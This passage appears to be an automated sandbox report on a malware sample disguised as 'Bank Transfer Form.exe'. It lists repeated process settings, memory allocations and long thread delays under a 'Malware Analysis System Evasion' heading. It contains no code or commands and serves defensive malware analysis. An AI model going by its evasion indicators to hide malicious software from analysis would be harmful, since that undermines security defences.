                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Bank Transfer Form.exe PID: 7404, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 9480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: A480000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: A6A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 7900000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: BA20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: CA20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: DA20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 1800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: 5280000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239867Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239750Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239640Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239507Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239405Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239297Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239187Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239074Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238953Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238843Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238734Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238625Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238485Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238235Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238109Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 237981Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598124Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597575Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597249Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596920Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596474Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596249Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595921Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595374Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeWindow / User API: threadDelayed 1241Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeWindow / User API: threadDelayed 1837Jump to behavior
